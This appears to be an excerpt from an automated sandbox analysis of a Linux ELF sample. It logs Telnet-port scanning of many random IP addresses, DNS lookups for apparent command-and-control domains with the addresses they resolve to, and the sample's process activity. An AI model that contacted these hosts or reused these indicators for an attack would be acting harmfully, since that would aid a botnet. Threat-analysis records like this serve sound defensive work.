        Nov 28, 2024 08:34:22.159287930 CET234822289.143.29.55192.168.2.23
        Nov 28, 2024 08:34:22.159297943 CET234822289.143.29.55192.168.2.23
        Nov 28, 2024 08:34:22.159306049 CET2356694149.46.11.38192.168.2.23
        Nov 28, 2024 08:34:22.159331083 CET2341506211.31.137.169192.168.2.23
        Nov 28, 2024 08:34:22.159341097 CET2343270180.64.52.199192.168.2.23
        Nov 28, 2024 08:34:22.159352064 CET2357224123.122.5.15192.168.2.23
        Nov 28, 2024 08:34:22.159352064 CET4822223192.168.2.2389.143.29.55
        Nov 28, 2024 08:34:22.159389973 CET4327023192.168.2.23180.64.52.199
        Nov 28, 2024 08:34:22.159390926 CET5669423192.168.2.23149.46.11.38
        Nov 28, 2024 08:34:22.159452915 CET4150623192.168.2.23211.31.137.169
        Nov 28, 2024 08:34:22.159452915 CET5722423192.168.2.23123.122.5.15
        Nov 28, 2024 08:34:24.039923906 CET3940223192.168.2.23178.115.55.179
        Nov 28, 2024 08:34:24.039982080 CET4103223192.168.2.23132.119.64.243
        Nov 28, 2024 08:34:24.040013075 CET4871423192.168.2.2313.197.145.151
        Nov 28, 2024 08:34:24.040047884 CET4934023192.168.2.23182.15.178.125
        Nov 28, 2024 08:34:24.040076971 CET4901423192.168.2.23178.212.102.185
        Nov 28, 2024 08:34:24.040102005 CET4493623192.168.2.2371.241.238.143
        Nov 28, 2024 08:34:24.040116072 CET3679823192.168.2.2373.19.101.47
        Nov 28, 2024 08:34:24.040169954 CET5409823192.168.2.23161.227.253.64
        Nov 28, 2024 08:34:24.040186882 CET4082823192.168.2.2315.104.219.209
        Nov 28, 2024 08:34:24.040210009 CET5484023192.168.2.23131.235.202.21
        Nov 28, 2024 08:34:24.040255070 CET3863223192.168.2.2353.13.250.81
        Nov 28, 2024 08:34:24.040277958 CET4074623192.168.2.23200.38.247.238
        Nov 28, 2024 08:34:24.040323019 CET3753223192.168.2.2364.93.134.209
        Nov 28, 2024 08:34:24.040347099 CET3495623192.168.2.23163.117.167.26
        Nov 28, 2024 08:34:24.040395975 CET4932623192.168.2.2347.76.95.135
        Nov 28, 2024 08:34:24.040421009 CET5973623192.168.2.2333.165.164.76
        Nov 28, 2024 08:34:24.040460110 CET4089823192.168.2.23178.82.182.153
        Nov 28, 2024 08:34:24.040493011 CET5328023192.168.2.23220.121.89.54
        Nov 28, 2024 08:34:24.040535927 CET5421223192.168.2.23117.103.7.62
        Nov 28, 2024 08:34:24.040554047 CET4958223192.168.2.23159.190.126.211
        Nov 28, 2024 08:34:24.160434008 CET2339402178.115.55.179192.168.2.23
        Nov 28, 2024 08:34:24.160445929 CET2341032132.119.64.243192.168.2.23
        Nov 28, 2024 08:34:24.160450935 CET234871413.197.145.151192.168.2.23
        Nov 28, 2024 08:34:24.160459995 CET2349340182.15.178.125192.168.2.23
        Nov 28, 2024 08:34:24.160464048 CET234493671.241.238.143192.168.2.23
        Nov 28, 2024 08:34:24.160687923 CET2349014178.212.102.185192.168.2.23
        Nov 28, 2024 08:34:24.160693884 CET3940223192.168.2.23178.115.55.179
        Nov 28, 2024 08:34:24.160696983 CET4934023192.168.2.23182.15.178.125
        Nov 28, 2024 08:34:24.160734892 CET4103223192.168.2.23132.119.64.243
        Nov 28, 2024 08:34:24.160746098 CET233679873.19.101.47192.168.2.23
        Nov 28, 2024 08:34:24.160758972 CET4871423192.168.2.2313.197.145.151
        Nov 28, 2024 08:34:24.160761118 CET2354098161.227.253.64192.168.2.23
        Nov 28, 2024 08:34:24.160770893 CET234082815.104.219.209192.168.2.23
        Nov 28, 2024 08:34:24.160773039 CET4493623192.168.2.2371.241.238.143
        Nov 28, 2024 08:34:24.160806894 CET5409823192.168.2.23161.227.253.64
        Nov 28, 2024 08:34:24.160808086 CET4082823192.168.2.2315.104.219.209
        Nov 28, 2024 08:34:24.160815001 CET2354840131.235.202.21192.168.2.23
        Nov 28, 2024 08:34:24.160810947 CET4901423192.168.2.23178.212.102.185
        Nov 28, 2024 08:34:24.160825014 CET3679823192.168.2.2373.19.101.47
        Nov 28, 2024 08:34:24.160861015 CET5484023192.168.2.23131.235.202.21
        Nov 28, 2024 08:34:24.280222893 CET233863253.13.250.81192.168.2.23
        Nov 28, 2024 08:34:24.280239105 CET2340746200.38.247.238192.168.2.23
        Nov 28, 2024 08:34:24.280249119 CET233753264.93.134.209192.168.2.23
        Nov 28, 2024 08:34:24.280258894 CET2334956163.117.167.26192.168.2.23
        Nov 28, 2024 08:34:24.280275106 CET234932647.76.95.135192.168.2.23
        Nov 28, 2024 08:34:24.280286074 CET235973633.165.164.76192.168.2.23
        Nov 28, 2024 08:34:24.280294895 CET2340898178.82.182.153192.168.2.23
        Nov 28, 2024 08:34:24.280302048 CET3495623192.168.2.23163.117.167.26
        Nov 28, 2024 08:34:24.280304909 CET2353280220.121.89.54192.168.2.23
        Nov 28, 2024 08:34:24.280314922 CET2354212117.103.7.62192.168.2.23
        Nov 28, 2024 08:34:24.280313969 CET3863223192.168.2.2353.13.250.81
        Nov 28, 2024 08:34:24.280313969 CET3753223192.168.2.2364.93.134.209
        Nov 28, 2024 08:34:24.280318022 CET4932623192.168.2.2347.76.95.135
        Nov 28, 2024 08:34:24.280324936 CET2349582159.190.126.211192.168.2.23
        Nov 28, 2024 08:34:24.280333042 CET4089823192.168.2.23178.82.182.153
        Nov 28, 2024 08:34:24.280380964 CET5421223192.168.2.23117.103.7.62
        Nov 28, 2024 08:34:24.280381918 CET4958223192.168.2.23159.190.126.211
        Nov 28, 2024 08:34:24.280473948 CET4074623192.168.2.23200.38.247.238
        Nov 28, 2024 08:34:24.280495882 CET5973623192.168.2.2333.165.164.76
        Nov 28, 2024 08:34:24.280519009 CET5328023192.168.2.23220.121.89.54
        Nov 28, 2024 08:34:26.954734087 CET234932647.76.95.135192.168.2.23
        Nov 28, 2024 08:34:26.955051899 CET4932623192.168.2.2347.76.95.135
        Nov 28, 2024 08:34:26.955271959 CET4412423192.168.2.23115.19.42.175
        Nov 28, 2024 08:34:27.075361967 CET234932647.76.95.135192.168.2.23
        Nov 28, 2024 08:34:27.075376034 CET2344124115.19.42.175192.168.2.23
        Nov 28, 2024 08:34:27.075589895 CET4412423192.168.2.23115.19.42.175
        Nov 28, 2024 08:34:35.959889889 CET3940223192.168.2.23178.115.55.179
        Nov 28, 2024 08:34:35.959889889 CET4103223192.168.2.23132.119.64.243
        Nov 28, 2024 08:34:35.959896088 CET4871423192.168.2.2313.197.145.151
        Nov 28, 2024 08:34:35.959902048 CET4901423192.168.2.23178.212.102.185
        Nov 28, 2024 08:34:35.959907055 CET3679823192.168.2.2373.19.101.47
        Nov 28, 2024 08:34:35.959923029 CET5409823192.168.2.23161.227.253.64
        Nov 28, 2024 08:34:35.959927082 CET4082823192.168.2.2315.104.219.209
        Nov 28, 2024 08:34:35.959927082 CET4934023192.168.2.23182.15.178.125
        Nov 28, 2024 08:34:35.959930897 CET5484023192.168.2.23131.235.202.21
        Nov 28, 2024 08:34:35.959927082 CET4493623192.168.2.2371.241.238.143
        Nov 28, 2024 08:34:35.959933043 CET4074623192.168.2.23200.38.247.238
        Nov 28, 2024 08:34:35.959961891 CET5973623192.168.2.2333.165.164.76
        Nov 28, 2024 08:34:35.959961891 CET3495623192.168.2.23163.117.167.26
        Nov 28, 2024 08:34:35.959966898 CET3863223192.168.2.2353.13.250.81
        Nov 28, 2024 08:34:35.959966898 CET3753223192.168.2.2364.93.134.209
        Nov 28, 2024 08:34:35.959974051 CET4089823192.168.2.23178.82.182.153
        Nov 28, 2024 08:34:35.959974051 CET5328023192.168.2.23220.121.89.54
        Nov 28, 2024 08:34:35.959992886 CET4958223192.168.2.23159.190.126.211
        Nov 28, 2024 08:34:35.960001945 CET5421223192.168.2.23117.103.7.62
        Nov 28, 2024 08:34:36.080306053 CET234871413.197.145.151192.168.2.23
        Nov 28, 2024 08:34:36.080513000 CET4871423192.168.2.2313.197.145.151
        Nov 28, 2024 08:34:36.080602884 CET233679873.19.101.47192.168.2.23
        Nov 28, 2024 08:34:36.080612898 CET2339402178.115.55.179192.168.2.23
        Nov 28, 2024 08:34:36.080630064 CET2341032132.119.64.243192.168.2.23
        Nov 28, 2024 08:34:36.080638885 CET2340746200.38.247.238192.168.2.23
        Nov 28, 2024 08:34:36.080645084 CET3940223192.168.2.23178.115.55.179
        Nov 28, 2024 08:34:36.080650091 CET2354098161.227.253.64192.168.2.23
        Nov 28, 2024 08:34:36.080667973 CET3679823192.168.2.2373.19.101.47
        Nov 28, 2024 08:34:36.080679893 CET2354840131.235.202.21192.168.2.23
        Nov 28, 2024 08:34:36.080687046 CET4103223192.168.2.23132.119.64.243
        Nov 28, 2024 08:34:36.080689907 CET2349014178.212.102.185192.168.2.23
        Nov 28, 2024 08:34:36.080704927 CET5409823192.168.2.23161.227.253.64
        Nov 28, 2024 08:34:36.080712080 CET234082815.104.219.209192.168.2.23
        Nov 28, 2024 08:34:36.080722094 CET4074623192.168.2.23200.38.247.238
        Nov 28, 2024 08:34:36.080724955 CET5484023192.168.2.23131.235.202.21
        Nov 28, 2024 08:34:36.080748081 CET235973633.165.164.76192.168.2.23
        Nov 28, 2024 08:34:36.080754995 CET4082823192.168.2.2315.104.219.209
        Nov 28, 2024 08:34:36.080758095 CET2334956163.117.167.26192.168.2.23
        Nov 28, 2024 08:34:36.080777884 CET4901423192.168.2.23178.212.102.185
        Nov 28, 2024 08:34:36.080790997 CET5973623192.168.2.2333.165.164.76
        Nov 28, 2024 08:34:36.080791950 CET2340898178.82.182.153192.168.2.23
        Nov 28, 2024 08:34:36.080792904 CET3495623192.168.2.23163.117.167.26
        Nov 28, 2024 08:34:36.080801964 CET2353280220.121.89.54192.168.2.23
        Nov 28, 2024 08:34:36.080811024 CET233863253.13.250.81192.168.2.23
        Nov 28, 2024 08:34:36.080825090 CET4089823192.168.2.23178.82.182.153
        Nov 28, 2024 08:34:36.080835104 CET5328023192.168.2.23220.121.89.54
        Nov 28, 2024 08:34:36.080845118 CET3863223192.168.2.2353.13.250.81
        Nov 28, 2024 08:34:36.080944061 CET233753264.93.134.209192.168.2.23
        Nov 28, 2024 08:34:36.080964088 CET2349340182.15.178.125192.168.2.23
        Nov 28, 2024 08:34:36.080974102 CET2349582159.190.126.211192.168.2.23
        Nov 28, 2024 08:34:36.080981970 CET234493671.241.238.143192.168.2.23
        Nov 28, 2024 08:34:36.080987930 CET3753223192.168.2.2364.93.134.209
        Nov 28, 2024 08:34:36.081001043 CET4958223192.168.2.23159.190.126.211
        Nov 28, 2024 08:34:36.081027985 CET4934023192.168.2.23182.15.178.125
        Nov 28, 2024 08:34:36.081027985 CET4493623192.168.2.2371.241.238.143
        Nov 28, 2024 08:34:36.081048012 CET2354212117.103.7.62192.168.2.23
        Nov 28, 2024 08:34:36.081093073 CET5421223192.168.2.23117.103.7.62
        Nov 28, 2024 08:34:37.961416960 CET4718023192.168.2.2395.31.56.0
        Nov 28, 2024 08:34:37.961438894 CET3450023192.168.2.2370.128.81.190
        Nov 28, 2024 08:34:37.961453915 CET4310223192.168.2.23146.156.59.80
        Nov 28, 2024 08:34:37.961458921 CET3405023192.168.2.23101.26.88.179
        Nov 28, 2024 08:34:37.961483955 CET5946623192.168.2.23123.179.199.78
        Nov 28, 2024 08:34:37.961505890 CET5047223192.168.2.23146.21.151.169
        Nov 28, 2024 08:34:37.961505890 CET3330623192.168.2.233.47.234.170
        Nov 28, 2024 08:34:37.961517096 CET5639423192.168.2.2399.19.81.149
        Nov 28, 2024 08:34:37.961519003 CET4330823192.168.2.23206.125.202.229
        Nov 28, 2024 08:34:37.961522102 CET4555423192.168.2.23196.107.70.241
        Nov 28, 2024 08:34:37.961540937 CET4557423192.168.2.2316.157.192.48
        Nov 28, 2024 08:34:37.961540937 CET4800623192.168.2.23204.223.45.104
        Nov 28, 2024 08:34:37.961576939 CET4960423192.168.2.23200.28.250.189
        Nov 28, 2024 08:34:37.961590052 CET5557623192.168.2.23110.244.33.144
        Nov 28, 2024 08:34:37.961596012 CET4882023192.168.2.23161.136.194.43
        Nov 28, 2024 08:34:37.961604118 CET4543223192.168.2.23194.142.193.122
        Nov 28, 2024 08:34:37.961618900 CET5579623192.168.2.234.247.211.114
        Nov 28, 2024 08:34:37.961631060 CET3459423192.168.2.2371.102.7.115
        Nov 28, 2024 08:34:37.961633921 CET5079223192.168.2.2324.96.141.184
        Nov 28, 2024 08:34:37.961635113 CET4412423192.168.2.23115.19.42.175
        Nov 28, 2024 08:34:38.081743002 CET234718095.31.56.0192.168.2.23
        Nov 28, 2024 08:34:38.081758022 CET233450070.128.81.190192.168.2.23
        Nov 28, 2024 08:34:38.081768990 CET2334050101.26.88.179192.168.2.23
        Nov 28, 2024 08:34:38.081845045 CET4718023192.168.2.2395.31.56.0
        Nov 28, 2024 08:34:38.081877947 CET3450023192.168.2.2370.128.81.190
        Nov 28, 2024 08:34:38.081887960 CET3405023192.168.2.23101.26.88.179
        Nov 28, 2024 08:34:38.082170010 CET2359466123.179.199.78192.168.2.23
        Nov 28, 2024 08:34:38.082220078 CET2350472146.21.151.169192.168.2.23
        Nov 28, 2024 08:34:38.082227945 CET5946623192.168.2.23123.179.199.78
        Nov 28, 2024 08:34:38.082231045 CET23333063.47.234.170192.168.2.23
        Nov 28, 2024 08:34:38.082248926 CET235639499.19.81.149192.168.2.23
        Nov 28, 2024 08:34:38.082258940 CET2345554196.107.70.241192.168.2.23
        Nov 28, 2024 08:34:38.082268953 CET5047223192.168.2.23146.21.151.169
        Nov 28, 2024 08:34:38.082273006 CET2343102146.156.59.80192.168.2.23
        Nov 28, 2024 08:34:38.082297087 CET3330623192.168.2.233.47.234.170
        Nov 28, 2024 08:34:38.082297087 CET234557416.157.192.48192.168.2.23
        Nov 28, 2024 08:34:38.082298994 CET5639423192.168.2.2399.19.81.149
        Nov 28, 2024 08:34:38.082309008 CET2343308206.125.202.229192.168.2.23
        Nov 28, 2024 08:34:38.082318068 CET2348006204.223.45.104192.168.2.23
        Nov 28, 2024 08:34:38.082323074 CET4555423192.168.2.23196.107.70.241
        Nov 28, 2024 08:34:38.082326889 CET2349604200.28.250.189192.168.2.23
        Nov 28, 2024 08:34:38.082336903 CET2355576110.244.33.144192.168.2.23
        Nov 28, 2024 08:34:38.082348108 CET2345432194.142.193.122192.168.2.23
        Nov 28, 2024 08:34:38.082349062 CET4330823192.168.2.23206.125.202.229
        Nov 28, 2024 08:34:38.082346916 CET4310223192.168.2.23146.156.59.80
        Nov 28, 2024 08:34:38.082357883 CET23557964.247.211.114192.168.2.23
        Nov 28, 2024 08:34:38.082361937 CET4800623192.168.2.23204.223.45.104
        Nov 28, 2024 08:34:38.082369089 CET4557423192.168.2.2316.157.192.48
        Nov 28, 2024 08:34:38.082377911 CET4960423192.168.2.23200.28.250.189
        Nov 28, 2024 08:34:38.082377911 CET5557623192.168.2.23110.244.33.144
        Nov 28, 2024 08:34:38.082384109 CET235079224.96.141.184192.168.2.23
        Nov 28, 2024 08:34:38.082393885 CET233459471.102.7.115192.168.2.23
        Nov 28, 2024 08:34:38.082396030 CET4543223192.168.2.23194.142.193.122
        Nov 28, 2024 08:34:38.082405090 CET2348820161.136.194.43192.168.2.23
        Nov 28, 2024 08:34:38.082410097 CET5579623192.168.2.234.247.211.114
        Nov 28, 2024 08:34:38.082416058 CET2344124115.19.42.175192.168.2.23
        Nov 28, 2024 08:34:38.082431078 CET5079223192.168.2.2324.96.141.184
        Nov 28, 2024 08:34:38.082452059 CET3459423192.168.2.2371.102.7.115
        Nov 28, 2024 08:34:38.082489014 CET4412423192.168.2.23115.19.42.175
        Nov 28, 2024 08:34:38.082494020 CET4882023192.168.2.23161.136.194.43
        Nov 28, 2024 08:34:38.962533951 CET4520023192.168.2.23164.108.236.113
        Nov 28, 2024 08:34:39.082523108 CET2345200164.108.236.113192.168.2.23
        Nov 28, 2024 08:34:39.082674026 CET4520023192.168.2.23164.108.236.113
        Nov 28, 2024 08:34:49.971795082 CET4718023192.168.2.2395.31.56.0
        Nov 28, 2024 08:34:49.971844912 CET3450023192.168.2.2370.128.81.190
        Nov 28, 2024 08:34:49.971869946 CET4310223192.168.2.23146.156.59.80
        Nov 28, 2024 08:34:49.971901894 CET3405023192.168.2.23101.26.88.179
        Nov 28, 2024 08:34:49.971913099 CET5047223192.168.2.23146.21.151.169
        Nov 28, 2024 08:34:49.971941948 CET3330623192.168.2.233.47.234.170
        Nov 28, 2024 08:34:49.971957922 CET5946623192.168.2.23123.179.199.78
        Nov 28, 2024 08:34:49.971988916 CET5639423192.168.2.2399.19.81.149
        Nov 28, 2024 08:34:49.972022057 CET4330823192.168.2.23206.125.202.229
        Nov 28, 2024 08:34:49.972038031 CET4555423192.168.2.23196.107.70.241
        Nov 28, 2024 08:34:49.972076893 CET4800623192.168.2.23204.223.45.104
        Nov 28, 2024 08:34:49.972080946 CET4557423192.168.2.2316.157.192.48
        Nov 28, 2024 08:34:49.972127914 CET4960423192.168.2.23200.28.250.189
        Nov 28, 2024 08:34:49.972132921 CET4882023192.168.2.23161.136.194.43
        Nov 28, 2024 08:34:49.972157001 CET4520023192.168.2.23164.108.236.113
        Nov 28, 2024 08:34:49.972170115 CET5557623192.168.2.23110.244.33.144
        Nov 28, 2024 08:34:49.972198963 CET4543223192.168.2.23194.142.193.122
        Nov 28, 2024 08:34:49.972225904 CET5579623192.168.2.234.247.211.114
        Nov 28, 2024 08:34:49.972249031 CET3459423192.168.2.2371.102.7.115
        Nov 28, 2024 08:34:49.972251892 CET5079223192.168.2.2324.96.141.184
        Nov 28, 2024 08:34:50.092094898 CET234718095.31.56.0192.168.2.23
        Nov 28, 2024 08:34:50.092195988 CET4718023192.168.2.2395.31.56.0
        Nov 28, 2024 08:34:50.092286110 CET233450070.128.81.190192.168.2.23
        Nov 28, 2024 08:34:50.092334032 CET3450023192.168.2.2370.128.81.190
        Nov 28, 2024 08:34:50.092339039 CET2343102146.156.59.80192.168.2.23
        Nov 28, 2024 08:34:50.092350006 CET2350472146.21.151.169192.168.2.23
        Nov 28, 2024 08:34:50.092392921 CET4310223192.168.2.23146.156.59.80
        Nov 28, 2024 08:34:50.092396021 CET5047223192.168.2.23146.21.151.169
        Nov 28, 2024 08:34:50.092736006 CET2334050101.26.88.179192.168.2.23
        Nov 28, 2024 08:34:50.092788935 CET23333063.47.234.170192.168.2.23
        Nov 28, 2024 08:34:50.092788935 CET3405023192.168.2.23101.26.88.179
        Nov 28, 2024 08:34:50.092801094 CET2359466123.179.199.78192.168.2.23
        Nov 28, 2024 08:34:50.092843056 CET3330623192.168.2.233.47.234.170
        Nov 28, 2024 08:34:50.092848063 CET235639499.19.81.149192.168.2.23
        Nov 28, 2024 08:34:50.092858076 CET2343308206.125.202.229192.168.2.23
        Nov 28, 2024 08:34:50.092869043 CET2345554196.107.70.241192.168.2.23
        Nov 28, 2024 08:34:50.092889071 CET5946623192.168.2.23123.179.199.78
        Nov 28, 2024 08:34:50.092895985 CET234557416.157.192.48192.168.2.23
        Nov 28, 2024 08:34:50.092905045 CET5639423192.168.2.2399.19.81.149
        Nov 28, 2024 08:34:50.092911005 CET4330823192.168.2.23206.125.202.229
        Nov 28, 2024 08:34:50.092928886 CET4555423192.168.2.23196.107.70.241
        Nov 28, 2024 08:34:50.092947006 CET4557423192.168.2.2316.157.192.48
        Nov 28, 2024 08:34:50.092953920 CET2348006204.223.45.104192.168.2.23
        Nov 28, 2024 08:34:50.092963934 CET2349604200.28.250.189192.168.2.23
        Nov 28, 2024 08:34:50.093009949 CET4800623192.168.2.23204.223.45.104
        Nov 28, 2024 08:34:50.093023062 CET4960423192.168.2.23200.28.250.189
        Nov 28, 2024 08:34:50.211882114 CET2345200164.108.236.113192.168.2.23
        Nov 28, 2024 08:34:50.211904049 CET2355576110.244.33.144192.168.2.23
        Nov 28, 2024 08:34:50.211930990 CET2348820161.136.194.43192.168.2.23
        Nov 28, 2024 08:34:50.211957932 CET4520023192.168.2.23164.108.236.113
        Nov 28, 2024 08:34:50.211980104 CET5557623192.168.2.23110.244.33.144
        Nov 28, 2024 08:34:50.212013960 CET4882023192.168.2.23161.136.194.43
        Nov 28, 2024 08:34:50.212724924 CET2345432194.142.193.122192.168.2.23
        Nov 28, 2024 08:34:50.212735891 CET23557964.247.211.114192.168.2.23
        Nov 28, 2024 08:34:50.212745905 CET235079224.96.141.184192.168.2.23
        Nov 28, 2024 08:34:50.212755919 CET233459471.102.7.115192.168.2.23
        Nov 28, 2024 08:34:50.212796926 CET5079223192.168.2.2324.96.141.184
        Nov 28, 2024 08:34:50.212832928 CET4543223192.168.2.23194.142.193.122
        Nov 28, 2024 08:34:50.212861061 CET5579623192.168.2.234.247.211.114
        Nov 28, 2024 08:34:50.212877989 CET3459423192.168.2.2371.102.7.115
        Nov 28, 2024 08:34:51.974443913 CET4007023192.168.2.2315.194.86.37
        Nov 28, 2024 08:34:51.974458933 CET5395023192.168.2.2314.27.29.229
        Nov 28, 2024 08:34:51.974462032 CET4280823192.168.2.23178.220.196.176
        Nov 28, 2024 08:34:51.974462986 CET6095423192.168.2.23139.41.101.186
        Nov 28, 2024 08:34:51.974488020 CET5506423192.168.2.23170.166.152.172
        Nov 28, 2024 08:34:51.974488020 CET3854223192.168.2.2347.89.129.239
        Nov 28, 2024 08:34:51.974494934 CET6059623192.168.2.2346.19.178.23
        Nov 28, 2024 08:34:51.974498987 CET3985223192.168.2.23220.63.218.142
        Nov 28, 2024 08:34:51.974522114 CET5640423192.168.2.23104.80.225.102
        Nov 28, 2024 08:34:51.974551916 CET4517823192.168.2.2380.5.187.186
        Nov 28, 2024 08:34:51.974572897 CET3849823192.168.2.2386.234.123.28
        Nov 28, 2024 08:34:51.974595070 CET3520623192.168.2.23114.22.99.143
        Nov 28, 2024 08:34:51.974600077 CET3716623192.168.2.23161.88.6.188
        Nov 28, 2024 08:34:51.974621058 CET3416623192.168.2.2325.92.252.75
        Nov 28, 2024 08:34:51.974658012 CET3502023192.168.2.23171.252.46.90
        Nov 28, 2024 08:34:51.974700928 CET5632623192.168.2.2372.1.56.198
        Nov 28, 2024 08:34:51.974725962 CET4274623192.168.2.2392.96.88.250
        Nov 28, 2024 08:34:51.974765062 CET3459223192.168.2.2376.136.85.249
        Nov 28, 2024 08:34:51.974793911 CET5468023192.168.2.2336.134.233.58
        Nov 28, 2024 08:34:51.974808931 CET5863823192.168.2.2364.120.51.93
        Nov 28, 2024 08:34:52.095232964 CET235395014.27.29.229192.168.2.23
        Nov 28, 2024 08:34:52.095263004 CET234007015.194.86.37192.168.2.23
        Nov 28, 2024 08:34:52.095272064 CET2342808178.220.196.176192.168.2.23
        Nov 28, 2024 08:34:52.095280886 CET2360954139.41.101.186192.168.2.23
        Nov 28, 2024 08:34:52.095298052 CET2339852220.63.218.142192.168.2.23
        Nov 28, 2024 08:34:52.095309019 CET236059646.19.178.23192.168.2.23
        Nov 28, 2024 08:34:52.095319033 CET2356404104.80.225.102192.168.2.23
        Nov 28, 2024 08:34:52.095328093 CET234517880.5.187.186192.168.2.23
        Nov 28, 2024 08:34:52.095336914 CET2355064170.166.152.172192.168.2.23
        Nov 28, 2024 08:34:52.095354080 CET233849886.234.123.28192.168.2.23
        Nov 28, 2024 08:34:52.095362902 CET233854247.89.129.239192.168.2.23
        Nov 28, 2024 08:34:52.095372915 CET2337166161.88.6.188192.168.2.23
        Nov 28, 2024 08:34:52.095385075 CET233416625.92.252.75192.168.2.23
        Nov 28, 2024 08:34:52.095395088 CET2335206114.22.99.143192.168.2.23
        Nov 28, 2024 08:34:52.095403910 CET2335020171.252.46.90192.168.2.23
        Nov 28, 2024 08:34:52.095417023 CET235632672.1.56.198192.168.2.23
        Nov 28, 2024 08:34:52.095424891 CET234274692.96.88.250192.168.2.23
        Nov 28, 2024 08:34:52.095434904 CET233459276.136.85.249192.168.2.23
        Nov 28, 2024 08:34:52.095442057 CET5640423192.168.2.23104.80.225.102
        Nov 28, 2024 08:34:52.095443964 CET235863864.120.51.93192.168.2.23
        Nov 28, 2024 08:34:52.095448017 CET4517823192.168.2.2380.5.187.186
        Nov 28, 2024 08:34:52.095448017 CET3849823192.168.2.2386.234.123.28
        Nov 28, 2024 08:34:52.095451117 CET3716623192.168.2.23161.88.6.188
        Nov 28, 2024 08:34:52.095454931 CET235468036.134.233.58192.168.2.23
        Nov 28, 2024 08:34:52.095460892 CET5395023192.168.2.2314.27.29.229
        Nov 28, 2024 08:34:52.095467091 CET6059623192.168.2.2346.19.178.23
        Nov 28, 2024 08:34:52.095467091 CET4007023192.168.2.2315.194.86.37
        Nov 28, 2024 08:34:52.095469952 CET6095423192.168.2.23139.41.101.186
        Nov 28, 2024 08:34:52.095469952 CET3985223192.168.2.23220.63.218.142
        Nov 28, 2024 08:34:52.095473051 CET3854223192.168.2.2347.89.129.239
        Nov 28, 2024 08:34:52.095477104 CET4280823192.168.2.23178.220.196.176
        Nov 28, 2024 08:34:52.095473051 CET3416623192.168.2.2325.92.252.75
        Nov 28, 2024 08:34:52.095473051 CET5506423192.168.2.23170.166.152.172
        Nov 28, 2024 08:34:52.095473051 CET4274623192.168.2.2392.96.88.250
        Nov 28, 2024 08:34:52.095500946 CET3520623192.168.2.23114.22.99.143
        Nov 28, 2024 08:34:52.095514059 CET3502023192.168.2.23171.252.46.90
        Nov 28, 2024 08:34:52.095526934 CET3459223192.168.2.2376.136.85.249
        Nov 28, 2024 08:34:52.095546961 CET5863823192.168.2.2364.120.51.93
        Nov 28, 2024 08:34:52.095566034 CET5632623192.168.2.2372.1.56.198
        Nov 28, 2024 08:34:52.095575094 CET5468023192.168.2.2336.134.233.58
        TimestampSource PortDest PortSource IPDest IP
        Nov 28, 2024 08:32:48.263479948 CET4470853192.168.2.2381.169.136.222
        Nov 28, 2024 08:32:48.509448051 CET534470881.169.136.222192.168.2.23
        Nov 28, 2024 08:33:00.038894892 CET4003053192.168.2.2381.169.136.222
        Nov 28, 2024 08:33:00.283927917 CET534003081.169.136.222192.168.2.23
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Nov 28, 2024 08:32:48.263479948 CET192.168.2.2381.169.136.2220xa505Standard query (0)burnthe.libreA (IP address)IN (0x0001)false
        Nov 28, 2024 08:33:00.038894892 CET192.168.2.2381.169.136.2220x8729Standard query (0)netfags.geek. [malformed]256428false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.213A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.248A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.245A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.242A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.214A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.247A (IP address)IN (0x0001)false
        Nov 28, 2024 08:32:48.509448051 CET81.169.136.222192.168.2.230xa505No error (0)burnthe.libre154.213.187.249A (IP address)IN (0x0001)false

        System Behavior

        Start time (UTC):07:32:46
        Start date (UTC):28/11/2024
        Path:/tmp/nabx86.elf
        Arguments:/tmp/nabx86.elf
        File size:37956 bytes
        MD5 hash:8733d552de33f075fdd894d5b0a1ee79

        Start time (UTC):07:32:46
        Start date (UTC):28/11/2024
        Path:/tmp/nabx86.elf
        Arguments:-
        File size:37956 bytes
        MD5 hash:8733d552de33f075fdd894d5b0a1ee79

        Start time (UTC):07:32:46
        Start date (UTC):28/11/2024
        Path:/tmp/nabx86.elf
        Arguments:-
        File size:37956 bytes
        MD5 hash:8733d552de33f075fdd894d5b0a1ee79

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/tmp/nabx86.elf
        Arguments:-
        File size:37956 bytes
        MD5 hash:8733d552de33f075fdd894d5b0a1ee79

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/tmp/nabx86.elf
        Arguments:-
        File size:37956 bytes
        MD5 hash:8733d552de33f075fdd894d5b0a1ee79

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/usr/bin/dash
        Arguments:-
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/usr/bin/rm
        Arguments:rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93
        File size:72056 bytes
        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/usr/bin/dash
        Arguments:-
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

        Start time (UTC):07:32:47
        Start date (UTC):28/11/2024
        Path:/usr/bin/rm
        Arguments:rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93
        File size:72056 bytes
        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b